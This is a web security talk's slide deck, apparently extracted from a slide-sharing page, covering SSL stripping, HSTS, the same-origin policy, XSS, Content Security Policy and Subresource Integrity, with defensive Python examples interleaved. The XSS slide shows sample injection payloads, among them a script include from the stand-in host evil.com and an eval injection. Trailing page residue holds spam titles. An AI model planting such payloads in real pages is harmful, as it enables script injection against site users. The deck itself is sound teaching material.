Why Traditional Web Security Technologies
no Longer Suffice to Keep You Safe
Philippe De Ryck
@PhilippeDeRyck https://www.websec.be
Which Scenario Would You Trust?
(a)
Visit website, browse public pages
Login with username and password
Consult private information
Visit website, browse public pages
Login with username and password
Consult private information
Visit website, browse public pages
Login with username and password
Consult private information
(b)
(c)
About Me – Philippe De Ryck
3
§ Postdoctoral Researcher @ DistriNet (KU Leuven)
§ PhD on client-side Web security
§ Expert in the broad field of Web security
§ Main author of the Primer on Client-Side Web Security
§ Running the Web Security training program
§ Dissemination of knowledge and research results
§ Public training courses and targeted in-house training
§ Target audiences include industry and researchers
§ Part of the organizing committee of SecAppDev.org
§ Week-long course focused on practical security
https://www.websec.be @PhilippeDeRyck
The Web Used to Be Server-Centric
5
With a lot of Server-Side Problems
6
http://arstechnica.com/security/2015/12/hackers-actively-exploit-critical-vulnerability-in-sites-running-joomla/
With a lot of Server-Side Problems
7
http://motherboard.vice.com/read/one-of-the-largest-hacks-yet-exposes-data-on-hundreds-of-thousands-of-kids
8
9
10
The Web has Become Client-Centric
11
The Network Can no Longer Be Trusted
12
Networks Are Everywhere
13
§ We happily connect to any wifi network we can find
§ Without knowing who has control over the network
§ Upstream networks are easily intercepted nowadays
§ Intercepting proxies at the network perimeter
§ ISPs inspecting and manipulating traffic
§ State agencies tapping the backbone
The Communication Channel Is Insecure
14
§ People are mainly concerned about eavesdropping attacks
§ Sniffing usernames, passwords, session identifiers, …
§ Demonstrated in 2010 by the Firesheep add-on
http://codebutler.com/firesheep/
The Communication Channel Is Insecure
15
§ People are mainly concerned about eavesdropping attacks
§ Sniffing usernames, passwords, session identifiers, …
§ Demonstrated in 2010 by the Firesheep add-on
§ Generally prevented by using HTTPS for sensitive data
§ But today, active network attacks are just as easy to execute
§ Man on the side attacks inject traffic into the network
§ Man in the middle attacks intercept and manipulate traffic
§ Simply using HTTPS for sensitive data no longer suffices
Care to Reconsider your Previous Answer?
(a)
Visit website, browse public pages
Login with username and password
Consult private information
Visit website, browse public pages
Login with username and password
Consult private information
Visit website, browse public pages
Login with username and password
Consult private information
(b)
(c)
Averting the Use of HTTPS
17
Stripping HTTPS from Login Forms
18
some-shop.com
Visit http://some-shop.com
Welcome, please log in
Login as Philippe
Welcome Philippe
Visit http://some-shop.com
Welcome, please log in
Login as Philippe
Welcome Philippe
Rewrite
HTTPS
to
HTTP
HTTPS Prevents Man in the Middle Attacks
19
some-shop.com
Visit https://some-shop.com
Welcome, please log in
Login as Philippe
Welcome Philippe
Visit https://some-shop.com
Welcome, please log in
Login as Philippe
Welcome Philippe
HTTPS Prevents Man in the Middle Attacks?
20
http://news.netcraft.com/archives/2016/03/17/95-of-https-servers-vulnerable-to-trivial-mitm-attacks.html
Bootstrapping the HTTPS Site
21
GET http://some-shop.com
200 OK
Response page
POST http://some-shop.com
GET http://…
301 Moved
GET https://…
200 OK
Rewrite
HTTPS
URLs
User: philippe & pass: pazzw0rd
POST https://…
some-shop.com
SSL Stripping Is a Sneaky Attack
22
HTTP Strict Transport Security (HSTS)
23
§ Instruct the browser to only visit a site over HTTPS
§ Once enabled, no HTTP requests will be sent to that host anymore
§ Prevents SSL stripping attacks
§ Prevents cookie stealing over HTTP
GET https://websec.be
websec.be
200 OK
Response page
HTTP Strict Transport Security (HSTS)
24
§ HSTS is a server-driven browser-enforced security policy
§ Server sends the Strict-Transport-Security response header
§ The protection is only applied for the duration of max-age
§ Make sure this value covers non-frequent visitors
§ The value 0 disables the HSTS policy for this particular host
• Only if received over an error-free channel
Strict-Transport-Security: max-age=31536000; includeSubdomains
Browser support table (residue): supported from version 4, 4, 7, 11, …, 4.4.4, 7.1
HSTS in Action
25
GET https://websec.be
websec.be
200 OK
Response page
Strict-Transport-Security: max-age=31536000;
includeSubdomains
GET https://websec.be
200 OK
Response page
Strict-Transport-Security: max-age=31536000;
includeSubdomains
www.websec.be
GET https://www.websec.be
200 OK
Response page
Strict-Transport-Security: max-age=31536000;
includeSubdomains
The Bootstrapping Problem … Again
26
GET https://websec.be
websec.be
200 OK
Response page
Strict-Transport-Security: max-age=31536000;
includeSubdomains
GET https://websec.be
200 OK
Response page
Strict-Transport-Security: max-age=31536000;
includeSubdomains
www.websec.be
GET https://www.websec.be
200 OK
Response page
Strict-Transport-Security: max-age=31536000;
includeSubdomains
Preloading HSTS
27
§ The bootstrapping problem is solved by a preloaded list
§ Contains all sites that have explicitly subscribed to HSTS
§ Distributed along with the browsers
§ Available on https://hstspreload.appspot.com/
HTTPS Should Be Enabled by Default
28
§ Browser vendors are strongly pushing towards HTTPS
§ Firefox marks HTTP pages with password fields as insecure
§ Google uses HTTPS as a ranking signal in its search engine
§ Active mixed content is blocked in modern browsers
§ Chrome and Firefox will support Secure Contexts
§ A Secure Context is delivered over HTTPS, including its parents
§ Powerful features will only be exposed to a Secure Context
• E.g. Geolocation, microphone and camera access, …
Hardening your HTTPS Deployment
29
§ Fine-tune the supported protocols and ciphers
§ Disable the old and obsolete SSLv2 and SSLv3
§ Avoid the use of old and weak ciphers
§ Move all your traffic to HTTPS
§ Immediately redirect all HTTP traffic to HTTPS
§ Prevent SSL Stripping by enabling Strict Transport Security (HSTS)
§ If you want to go all out, enable Public Key Pinning (HPKP)
§ Prevents impersonation attacks with rogue but valid certificates
https://www.ssllabs.com/ssltest/
Insecure Third-Party Content Can Be Disastrous
30
Browsers Do More than Rendering HTML
31
§ Modern browsers are full-fledged application platforms
§ Plenty of system features are exposed to Web applications
• Battery status, Vibration, Geolocation, Microphone & Camera, …
§ ChromeOS and FirefoxOS run all applications inside a browser
§ The key enabler for all of this functionality is JavaScript
§ Since its introduction in 1995, JS has finally taken over the Web
§ Plugins like Flash and Silverlight are slowly fading away
§ So, how about security?
§ We have the same-origin policy, but it’s 20 years old …
The Same-Origin Policy
32
http://example.com
http://example.com
http://example.com
http://private.example.com
http://forum.example.com
http://private.example.com
SAME-ORIGIN POLICY
Content retrieved from one
origin can freely interact with
other content from that origin,
but interactions with content
from other origins are restricted
ORIGIN
The triple <scheme, host, port>
derived from the document’s URL.
For http://example.org/forum/, the
origin is <http, example.org, 80>
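The origin definition on this slide is mechanical enough to implement. The following is an added example, not part of the slides: it derives the <scheme, host, port> triple from a URL, filling in the default port for the scheme, and uses it to decide which of the URLs from the slide share an origin.

```python
"""Derive the origin triple <scheme, host, port> from a URL (added example)."""
from urllib.parse import urlsplit

# Default ports used when the URL does not name one explicitly
DEFAULT_PORTS = {"http": 80, "https": 443, "ws": 80, "wss": 443}


def origin_of(url: str) -> tuple[str, str, int]:
    """Return (scheme, host, port); http://example.org/forum/ -> ('http', 'example.org', 80)."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS or not parts.hostname:
        raise ValueError(f"cannot derive an origin from {url!r}")
    port = parts.port if parts.port is not None else DEFAULT_PORTS[scheme]
    # hostname is already lower-cased by urlsplit; path, query and fragment are irrelevant
    return (scheme, parts.hostname, port)


def same_origin(a: str, b: str) -> bool:
    return origin_of(a) == origin_of(b)


def cross_origin_resources(page_url: str, resource_urls: list[str]) -> list[str]:
    """Resources the same-origin policy would isolate from the page."""
    return [r for r in resource_urls if not same_origin(page_url, r)]


if __name__ == "__main__":
    page = "http://example.com/"
    others = ["http://example.com/app.js", "http://private.example.com/",
              "http://forum.example.com/", "https://example.com/"]
    print(cross_origin_resources(page, others))
```

Note that a subdomain (private.example.com) and a scheme change (https) both produce a different origin, which is exactly why the slide shows them as separate boxes.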
Origins, Frames and Scripts
33
§ The browser enforces origin-based separation
§ Frames have a context, a document URL and an associated context
§ Scripts are loaded into the context of the including page
§ Classical trade-off between isolation and flexibility
http://example.com
http://malvertisements.com
http://example.com
Script code from
http://malvertisements.com
<iframe src="http://malvertisements.com/pwnme.html">
<script src="http://malvertisements.com/pwnme.js">
The Same-Origin Policy in Practice
34
§ Most content integration is script-based
§ Included directly into the application’s context
§ Which makes sense for libraries, such as JQuery
§ But not for standalone third-party components
§ Every included script is a security risk
§ Because it has full access to your context
§ So you have to trust the supplier
§ And the security of their systems
https://medium.com/@FredericJacobs/the-reuters-compromise-by-the-syrian-electronic-army-6bf570e1a85b
Responsibly Including Third-Party Content
36
§ Isolate the content in a context with a different origin
§ Let the Same-Origin Policy protect you
§ Enable interaction by exchanging messages between contexts
§ Further restrict isolated context using the HTML5 Sandbox
§ Allows you to disable certain features in a framed context
§ Allows you to place your own content in a unique origin
§ Verify the integrity of content loaded from a CDN
§ Enabled by the brand new Subresource Integrity specification
§ Prevents malware distribution by compromising a CDN
https://blogs.dropbox.com/tech/2015/09/csp-third-party-integrations-and-privilege-separation/
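The Subresource Integrity check mentioned on this slide is a hash comparison the browser performs before executing a script. The following is an added example, not code from the slides or from the SRI specification's authors: it generates the integrity attribute for a script body and verifies a fetched body against it, following the rule that only tokens of the strongest listed algorithm count. The script body is constructed for the example.

```python
"""Generate and verify Subresource Integrity (SRI) metadata (added example)."""
import base64
import hashlib
import hmac

# Algorithms the SRI specification allows, weakest to strongest
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}

SAMPLE_SCRIPT = b"window.greet = function () { return 'hello'; };\n"  # constructed


def integrity_for(body: bytes, alg: str = "sha384") -> str:
    """Return '<alg>-<base64 digest>' as used in the integrity attribute."""
    if alg not in STRENGTH:
        raise ValueError("SRI only allows sha256, sha384 or sha512")
    digest = hashlib.new(alg, body).digest()
    return f"{alg}-{base64.b64encode(digest).decode('ascii')}"


def verify_integrity(body: bytes, integrity: str) -> bool:
    """Mimic the browser: keep only tokens with a known algorithm, pick the
    strongest algorithm present, and accept if any token of that algorithm
    matches. An attribute with no usable token enforces nothing (returns True),
    which is why a typo in the attribute silently removes the protection."""
    tokens = []
    for tok in integrity.split():
        alg, _, expected = tok.partition("-")
        alg = alg.lower()
        if alg in STRENGTH and expected:
            tokens.append((alg, expected.split("?")[0]))  # '?options' are ignored
    if not tokens:
        return True
    strongest = max(STRENGTH[a] for a, _ in tokens)
    for alg, expected in tokens:
        if STRENGTH[alg] != strongest:
            continue
        actual = integrity_for(body, alg).split("-", 1)[1]
        if hmac.compare_digest(actual, expected):
            return True
    return False


def script_tag(url: str, body: bytes) -> str:
    """Render a script include pinned to the body's hash; crossorigin is needed
    for a cross-origin resource to be eligible for the SRI check."""
    return f'<script src="{url}" integrity="{integrity_for(body)}" crossorigin="anonymous"></script>'


if __name__ == "__main__":
    print(script_tag("https://cdn.example/greet.js", SAMPLE_SCRIPT))  # constructed URL
```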
With XSS, the Attacker Includes the Code for You
37
Add review
Thanks for the review!
reviews
I can really recommend product X. It is awesome!
<script>alert('Never gonna let you down!')</script>
Show Reviews
Reviews page
<html><body>… …</body></html>
38
http://blog.detectify.com/post/39209711597/how-i-got-a-3500-usd-facebook-bug-bounty
39
http://www.zdnet.com/article/ubuntu-forums-hacked-1-82m-logins-email-addresses-stolen/
Traditional XSS Defenses
40
§ The server compiles data and code into a single HTML page
§ XSS causes the browser to mistake data for code
§ The proper defense is context-sensitive output encoding
§ Encode for the context where the data will be used
§ HTML body: <h1>DATA</h1>
§ HTML attributes: <div id='DATA'>
§ Stylesheet context: body { background-color: DATA; }
§ Script context: alert("DATA");
§ URL context: <a href="http://…?arg=DATA">
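One encoder per context from the list above, as an added example that is not code from the slides. The review text from the earlier XSS slide is used as constructed input, and the page template is a constructed stand-in for the server-side "compile data and code into one page" step.

```python
"""Context-sensitive output encoding for the five contexts on the slide (added example)."""
import html
import json
from urllib.parse import quote

# Constructed input: the review posted on the earlier slide
REVIEW = ("I can really recommend product X. It is awesome! "
          "<script>alert('Never gonna let you down!')</script>")


def encode_html_body(data: str) -> str:
    return html.escape(data, quote=True)


def encode_html_attr(data: str) -> str:
    # Same character set as the body; the template must still quote the attribute,
    # an unquoted attribute can be left with a plain space.
    return html.escape(data, quote=True)


def encode_css_value(data: str) -> str:
    # CSS is a hostile context: hex-escape everything but ASCII letters and digits.
    # For real colour values, validating against an allow-list is the better control.
    return "".join(ch if ch.isascii() and ch.isalnum() else f"\\{ord(ch):06x}" for ch in data)


def encode_js_string(data: str) -> str:
    # JSON escaping covers ", \, control characters and (with ensure_ascii) U+2028/2029;
    # additionally escape < > & ' so the value is safe inside either quote style and
    # cannot contain a literal </script>.
    inner = json.dumps(data)[1:-1]
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"), ("'", "\\u0027")):
        inner = inner.replace(ch, esc)
    return inner


def encode_url_param(data: str) -> str:
    return quote(data, safe="")


def render_review(review: str) -> str:
    """Constructed template placing the same data in each context with its encoder."""
    return (
        f"<h1>{encode_html_body(review)}</h1>\n"
        f'<div id="{encode_html_attr(review)}"></div>\n'
        f"<style>body {{ background-color: {encode_css_value(review)}; }}</style>\n"
        f'<script>alert("{encode_js_string(review)}");</script>\n'
        f'<a href="http://some-shop.com/search?q={encode_url_param(review)}">link</a>'
    )


if __name__ == "__main__":
    print(render_review(REVIEW))
```

The only `<script>` tag in the rendered output is the one the template itself contains; the injected one survives only as inert text in every context.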
Content Security Policy against XSS
41
<h1>You searched for<script>alert('XSS');</script></h1>
XSS WITH INLINE SCRIPTS
<h1>You searched for<script src="https://evil.com/hackme.js"></script></h1>
XSS WITH REMOTE SCRIPTS
eval('alert("Your query string was '
+ unescape(document.location.search) //hello%22);alert(1+%22
+ '");');
XSS WITH EVAL
The Essence of CSP
42
§ CSP reduces the harm of content injection vulnerabilities
§ By telling the client where resources should be loaded from
§ By disabling “dangerous features” by default
§ CSP is intended as a second line of defense
§ CSP will become more important in the future
§ Supporting CSP in your application may be non-trivial
§ Use of inline script blocks is disallowed
§ Use of eval is disallowed
Introducing CSP by Example
43
Content-Security-Policy:
default-src 'self';
script-src 'self' https://cdnjs.cloudflare.com;
style-src 'self' https://cdnjs.cloudflare.com/…/bootstrap.min.css;
EXAMPLE POLICY
§ A policy consists of a set of directives
§ Each directive controls a different kind of resource
§ Policy is delivered as an HTTP header by the server
• Alternatively, the meta tag can also be used
§ Compatible browsers will enforce the policy on the response
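To show what "each directive controls a different kind of resource" means in practice, here is an added example (not code from the slides or from any browser) that parses a policy like the one above and decides whether a given load is allowed, including the fallback to default-src for directives the policy does not name. The Bootstrap path in the example policy is a constructed stand-in for the elided path on the slide; host wildcards, nonces and hashes are deliberately not implemented.

```python
"""Minimal Content-Security-Policy evaluator (added example)."""
from urllib.parse import urlsplit

# Constructed stand-in for the elided CDN path on the slide
BOOTSTRAP_CSS = "https://cdnjs.cloudflare.com/libs/example/bootstrap.min.css"
EXAMPLE_POLICY = (
    "default-src 'self'; "
    "script-src 'self' https://cdnjs.cloudflare.com; "
    f"style-src 'self' {BOOTSTRAP_CSS}"
)


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split 'name src src; name src' into a directive map; the first occurrence wins."""
    directives: dict[str, list[str]] = {}
    for raw in header.split(";"):
        parts = raw.split()
        if parts and parts[0].lower() not in directives:
            directives[parts[0].lower()] = parts[1:]
    return directives


def effective_sources(policy: dict[str, list[str]], directive: str):
    """Fetch directives fall back to default-src; None means unrestricted."""
    return policy.get(directive, policy.get("default-src"))


def origin_str(url: str) -> str:
    u = urlsplit(url)
    return f"{u.scheme.lower()}://{u.netloc.lower()}"  # explicit default ports not normalised


def source_matches(expr: str, page_origin: str, url: str) -> bool:
    expr_l = expr.lower()
    u = urlsplit(url)
    if expr_l == "'none'":
        return False
    if expr_l == "'self'":
        return origin_str(url) == page_origin
    if expr_l.startswith("'"):
        return False  # keywords such as 'unsafe-inline' never match a URL
    if expr_l.endswith(":") and "://" not in expr_l:
        return u.scheme.lower() + ":" == expr_l  # scheme-source, e.g. https:
    e = urlsplit(expr if "://" in expr else f"{u.scheme}://{expr}")
    if (e.scheme.lower(), e.netloc.lower()) != (u.scheme.lower(), u.netloc.lower()):
        return False
    if not e.path or e.path == "/":
        return True  # whole host allowed
    if e.path.endswith("/"):
        return u.path.startswith(e.path)  # directory prefix
    return u.path == e.path  # exact file


def is_allowed(header: str, directive: str, page_url: str, resource_url: str) -> bool:
    sources = effective_sources(parse_csp(header), directive)
    if sources is None:
        return True
    page_origin = origin_str(page_url)
    return any(source_matches(s, page_origin, resource_url) for s in sources)


def permits_keyword(header: str, directive: str, keyword: str) -> bool:
    """Whether e.g. 'unsafe-inline' or 'unsafe-eval' is granted for a directive."""
    sources = effective_sources(parse_csp(header), directive)
    return sources is None or keyword.lower() in (s.lower() for s in sources)


if __name__ == "__main__":
    page = "https://some-shop.com/search"
    print(is_allowed(EXAMPLE_POLICY, "script-src", page, "https://evil.com/hackme.js"))  # False
    print(permits_keyword(EXAMPLE_POLICY, "script-src", "'unsafe-inline'"))  # False
```

Because the example policy names neither 'unsafe-inline' nor 'unsafe-eval', the three XSS variants on the previous slide (inline script, remote script from another host, eval) are all blocked, which is the "dangerous features disabled by default" behaviour described above.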
CSP is the Security Policy of the Future
44
§ CSP has been well received, and evolved quickly
§ Addition of plugin types, sandbox, child contexts, form destinations
§ Re-enabling inline script with support for nonces and hashes
§ Deprecates X-FRAME-OPTIONS header
§ Supports blocking of mixed content / upgrading insecure requests
§ CSP level 1 is widely supported by browsers
§ Support for level 2 is less widespread, but improving rapidly
§ Chrome makes CSP mandatory for its components
§ Browser extensions and packaged apps
CSP Violation Reports
45
§ CSP can report violations back to the resource server
§ Allows for fine-tuning of the CSP policy
§ Gives insights in actual attacks
§ Enabled by using the report-uri directive
§ Points to a handler on the server that can process reports
Content-Security-Policy:
default-src 'self';
report-uri http://some-shop.com/csp-report.cgi
EXAMPLE POLICY
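A handler behind report-uri receives a JSON document with a top-level csp-report object; the field names used below come from the CSP specification. The following is an added example, not code from the slides: it validates and aggregates reports so that the two uses named above, policy tuning and spotting actual attacks, can be told apart by looking at how often a (directive, blocked-uri) pair recurs. All sample reports are constructed, and since anyone can POST to the endpoint, the bodies are treated as untrusted input with a size limit.

```python
"""Parse and aggregate CSP violation reports (added example)."""
import json
from collections import Counter

MAX_REPORT_BYTES = 16 * 1024  # reports are attacker-postable; refuse oversized bodies


def _report(document, directive, blocked, source="", line=None):
    # Helper to build constructed sample bodies in the csp-report wire format
    body = {"document-uri": document, "violated-directive": directive,
            "blocked-uri": blocked, "source-file": source, "line-number": line}
    return json.dumps({"csp-report": body})


SAMPLE_REPORTS = [  # constructed
    _report("https://some-shop.com/", "script-src", "https://cdn.example/analytics.js"),
    _report("https://some-shop.com/cart", "script-src", "https://cdn.example/analytics.js"),
    _report("https://some-shop.com/reviews", "script-src", "inline",
            "https://some-shop.com/reviews", 42),
    '{"not-a-report": true}',
    "garbage",
]


def parse_report(body: str) -> dict:
    """Extract the fields worth keeping; raise ValueError for anything unusable."""
    if len(body) > MAX_REPORT_BYTES:
        raise ValueError("report too large")
    data = json.loads(body)  # JSONDecodeError is a ValueError subclass
    report = data.get("csp-report") if isinstance(data, dict) else None
    if not isinstance(report, dict):
        raise ValueError("missing csp-report object")
    return {
        "document": str(report.get("document-uri", "")),
        # CSP3 reports carry the bare directive name; CSP2 may include its value
        "directive": str(report.get("violated-directive", report.get("effective-directive", ""))).split()[0],
        "blocked": str(report.get("blocked-uri", "")),
        "source": str(report.get("source-file", "")),
        "line": report.get("line-number"),
    }


def summarize(bodies) -> Counter:
    """Count (directive, blocked-uri) pairs across reports, skipping malformed ones.
    Many documents blocking the same legitimate CDN host points at a policy omission;
    'inline' or an unfamiliar host on one page is what an injection attempt looks like."""
    counts: Counter = Counter()
    for body in bodies:
        try:
            r = parse_report(body)
        except ValueError:
            continue
        counts[(r["directive"], r["blocked"])] += 1
    return counts


if __name__ == "__main__":
    for (directive, blocked), n in summarize(SAMPLE_REPORTS).most_common():
        print(f"{n:4d}  {directive:12s} {blocked}")
```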
The Web has Become Client-Centric
46
Progressive Web Security
47
§ Take a progressive stance towards Web security
§ The Web has become client-centric, and so has Web security
§ Fully protecting your applications requires the latest technologies
§ All of these security technologies require explicit action
§ Training is essential to keep up to date with the latest technologies
§ Share your experiences, help others advance as well
§ Set an example on how to do it right
48
I hope you learned something tonight …
Now it’s up to you
Grab a copy of the slides and share with anyone you can find
Read my blog or follow me on Twitter to stay informed about web security
Level up with Web security training!
All information on
https://www.websec.be
Why Traditional Web Security Technologies
no Longer Suffice to Keep You Safe
Acknowledgements
Icons by Visual Pharm (https://icons8.com)
Images by Unsplash (https://unsplash.com/)
Why Traditional Web Security Technologies
no Longer Suffice to Keep You Safe
Philippe De Ryck
philippe.deryck@cs.kuleuven.be
/in/philippederyck
https://www.websec.be
@PhilippeDeRyck
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 

Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe

  • 1. Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe Philippe De Ryck @PhilippeDeRyck https://www.websec.be
  • 2. Which Scenario Would You Trust?
    (a) Visit website, browse public pages → Login with username and password → Consult private information
    (b) Visit website, browse public pages → Login with username and password → Consult private information
    (c) Visit website, browse public pages → Login with username and password → Consult private information
  • 3. About Me – Philippe De Ryck
    § Postdoctoral Researcher @ DistriNet (KU Leuven)
    § PhD on client-side Web security
    § Expert in the broad field of Web security
    § Main author of the Primer on Client-Side Web Security
    § Running the Web Security training program
    § Dissemination of knowledge and research results
    § Public training courses and targeted in-house training
    § Target audiences include industry and researchers
    § Part of the organizing committee of SecAppDev.org
    § Week-long course focused on practical security
    https://www.websec.be @PhilippeDeRyck
  • 4.
  • 5. The Web Used to Be Server-Centric 5
  • 6. With a lot of Server-Side Problems 6 http://arstechnica.com/security/2015/12/hackers-actively-exploit-critical-vulnerability-in-sites-running-joomla/
  • 7. With a lot of Server-Side Problems 7 http://motherboard.vice.com/read/one-of-the-largest-hacks-yet-exposes-data-on-hundreds-of-thousands-of-kids
  • 8. 8
  • 9. 9
  • 10. 10
  • 11. The Web has Become Client-Centric 11
  • 12. The Network Can no Longer Be Trusted 12
  • 13. Networks Are Everywhere
    § We happily connect to any wifi network we can find
    § Without knowing who has control over the network
    § Upstream networks are easily intercepted nowadays
    § Intercepting proxies at the network perimeter
    § ISPs inspecting and manipulating traffic
    § State agencies tapping the backbone
  • 14. The Communication Channel Is Insecure
    § People are mainly concerned about eavesdropping attacks
    § Sniffing usernames, passwords, session identifiers, …
    § Demonstrated in 2010 by the Firesheep add-on
    http://codebutler.com/firesheep/
  • 15. The Communication Channel Is Insecure
    § People are mainly concerned about eavesdropping attacks
    § Sniffing usernames, passwords, session identifiers, …
    § Demonstrated in 2010 by the Firesheep add-on
    § Generally prevented by using HTTPS for sensitive data
    § But today, active network attacks are just as easy to execute
    § Man on the side attacks inject traffic into the network
    § Man in the middle attacks intercept and manipulate traffic
    § Simply using HTTPS for sensitive data no longer suffices
  • 16. Care to Reconsider your Previous Answer?
    (a) Visit website, browse public pages → Login with username and password → Consult private information
    (b) Visit website, browse public pages → Login with username and password → Consult private information
    (c) Visit website, browse public pages → Login with username and password → Consult private information
  • 17. Averting the Use of HTTPS 17
  • 18. Stripping HTTPS from Login Forms
    User ↔ man in the middle: Visit http://some-shop.com / Welcome, please log in / Login as Philippe / Welcome Philippe
    Man in the middle ↔ some-shop.com: Visit http://some-shop.com / Welcome, please log in / Login as Philippe / Welcome Philippe
    Man in the middle: Rewrite HTTPS to HTTP
  • 19. HTTPS Prevents Man in the Middle Attacks
    User ↔ man in the middle: Visit https://some-shop.com / Welcome, please log in / Login as Philippe / Welcome Philippe
    Man in the middle ↔ some-shop.com: Visit https://some-shop.com / Welcome, please log in / Login as Philippe / Welcome Philippe
  • 20. HTTPS Prevents Man in the Middle Attacks? 20 http://news.netcraft.com/archives/2016/03/17/95-of-https-servers-vulnerable-to-trivial-mitm-attacks.html
  • 21. Bootstrapping the HTTPS Site
    Browser → man in the middle: GET http://some-shop.com
    Man in the middle → some-shop.com: GET http://…
    some-shop.com → man in the middle: 301 Moved
    Man in the middle → some-shop.com: GET https://…
    some-shop.com → man in the middle: 200 OK
    Man in the middle: Rewrite HTTPS URLs
    Man in the middle → browser: 200 OK Response page
    Browser → man in the middle: POST http://some-shop.com (User: philippe & pass: pazzw0rd)
    Man in the middle → some-shop.com: POST https://…
  • 22. SSL Stripping Is a Sneaky Attack 22
  • 23. HTTP Strict Transport Security (HSTS)
    § Instruct the browser to only visit a site over HTTPS
    § Once enabled, no HTTP requests will be sent anymore
    § Prevents SSL stripping attacks
    § Prevents cookie stealing over HTTP
    Browser → websec.be: GET https://websec.be
    websec.be → browser: 200 OK Response page
  • 24. HTTP Strict Transport Security (HSTS)
    § HSTS is a server-driven, browser-enforced security policy
    § Server sends the Strict-Transport-Security response header
    § The protection is only applied for the duration of max-age
    § Make sure this value covers non-frequent visitors
    § The value 0 disables the HSTS policy for this particular host
      • Only if received over an error-free channel
    Strict-Transport-Security: max-age=31536000; includeSubdomains
    [Browser support table: from version 4, 4, 7, 11, 4.4.4, 7.1]
  • 25. HSTS in Action
    Browser → websec.be: GET https://websec.be
    websec.be → browser: 200 OK Response page, Strict-Transport-Security: max-age=31536000; includeSubdomains
    Browser → websec.be: GET https://websec.be
    websec.be → browser: 200 OK Response page, Strict-Transport-Security: max-age=31536000; includeSubdomains
    Browser → www.websec.be: GET https://www.websec.be
    www.websec.be → browser: 200 OK Response page, Strict-Transport-Security: max-age=31536000; includeSubdomains
  • 26. The Bootstrapping Problem … Again
    Browser → websec.be: GET https://websec.be
    websec.be → browser: 200 OK Response page, Strict-Transport-Security: max-age=31536000; includeSubdomains
    Browser → websec.be: GET https://websec.be
    websec.be → browser: 200 OK Response page, Strict-Transport-Security: max-age=31536000; includeSubdomains
    Browser → www.websec.be: GET https://www.websec.be
    www.websec.be → browser: 200 OK Response page, Strict-Transport-Security: max-age=31536000; includeSubdomains
  • 27. Preloading HSTS
    § The bootstrapping problem is solved by a preloaded list
    § Contains all sites that have explicitly subscribed to HSTS
    § Distributed along with the browsers
    § Available on https://hstspreload.appspot.com/
